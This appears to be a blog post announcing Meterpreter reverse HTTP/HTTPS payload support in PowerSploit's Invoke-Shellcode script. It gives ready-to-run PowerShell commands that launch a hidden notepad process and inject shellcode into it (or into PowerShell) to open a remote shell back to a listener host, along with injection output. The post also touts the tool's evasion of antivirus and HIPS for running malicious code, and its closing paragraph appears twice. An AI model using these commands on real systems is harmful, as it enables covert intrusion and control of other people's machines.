The Invoke-Shellcode script, which is part of the PowerSploit project now supports windows/meterpreter/reverse_http and windows/meterpreter/reverse_https payloads. Now, you don't have to pre-generate your shellcode ahead of time if you don't want to. The new syntax for this feature can be seen in the following examples:
Example #1
Establishes a reverse https meterpreter payload from within the hidden notepad process.
PS> Start-Process C:\Windows\SysWOW64\notepad.exe -WindowStyle Hidden
PS> $Proc = Get-Process notepad
PS> Invoke-Shellcode -Remote -ProcessId $Proc.Id -Meterpreter_Reverse_Https -Lhost 192.168.30.129 -Lport 443 -Verbose
VERBOSE: Requesting meterpreter payload from https://192.168.30.129:443/INITM
VERBOSE: Injecting shellcode into PID: 4004
VERBOSE: Injecting into a Wow64 process.
VERBOSE: Using 32-bit shellcode.
VERBOSE: Shellcode memory reserved at 0x03BE0000
VERBOSE: Emitting 32-bit assembly call stub.
VERBOSE: Thread call stub memory reserved at 0x001B0000
VERBOSE: Shellcode injection complete!
A multi-handler was set up with the following options:
Payload options (windows/meterpreter/reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST 192.168.30.129 yes The local listener hostname
LPORT 443 yes The local listener port
Example #2
Establishes a reverse http meterpreter payload from within the running PowerShell process.
PS> Invoke-Shellcode -Local -Meterpreter_Reverse_Http -Lhost 192.168.30.129 -Lport 80
A multi-handler was set up with the following options:
Payload options (windows/meterpreter/reverse_http):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST 192.168.30.129 yes The local listener hostname
LPORT 80 yes The local listener port
It's worth noting that because the reverse http[s] payloads are only supported in 32-bit, you must run these commands from 32-bit PowerShell. I plan on adding additional 32 and 64-bit payloads in the future.
As usual, let me know if you run into any bugs or have any feature requests.
Lastly, I really want to drive the point home that by using Invoke-Shellcode, you are practically assured that you will not be flagged by signature-based antivirus. So if you're on a machine with PowerShell, which is increasingly likely these days, no more are the days where you'd have to generate thousands of encoded Meterpreter executables in the hopes that one of them might not get flagged by AV. Also, using this script, you are not dropping an executable onto the disk. Essentially, Invoke-Shellcode should alleviate many if not all the headaches associated with running malicious code on a machine running AV or HIPS products.
Please enjoy responsibly. :D
Lastly, I really want to drive the point home that by using Invoke-Shellcode, you are practically assured that you will not be flagged by signature-based antivirus. So if you're on a machine with PowerShell, which is increasingly likely these days, no more are the days where you'd have to generate thousands of encoded Meterpreter executables in the hopes that one of them might not get flagged by AV. Also, using this script, you are not dropping an executable onto the disk. Essentially, Invoke-Shellcode should alleviate many if not all the headaches associated with running malicious code on a machine running AV or HIPS products.
Please enjoy responsibly. :D